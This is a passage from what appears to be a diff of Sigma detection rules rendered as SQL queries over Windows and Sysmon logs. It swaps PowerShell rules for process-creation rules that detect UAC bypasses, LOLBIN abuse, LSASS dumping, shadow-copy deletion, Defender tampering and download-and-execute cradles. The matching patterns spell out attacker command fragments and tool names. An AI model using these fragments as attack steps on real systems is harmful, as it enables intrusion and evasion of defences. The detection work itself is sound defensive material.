'\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Diagnostics" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": 
"WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative scripts that use the same keywords." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" - ], - "filename": "posh_ps_wmimplant.yml" - }, - { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, 
uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "status": "experimental", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" 
+ "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. 
Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE 
'%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND 
CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - 
"filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE 
'%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", 
+ "author": "Sreeman", "tags": [ + "attack.defense_evasion", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ 
"attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil 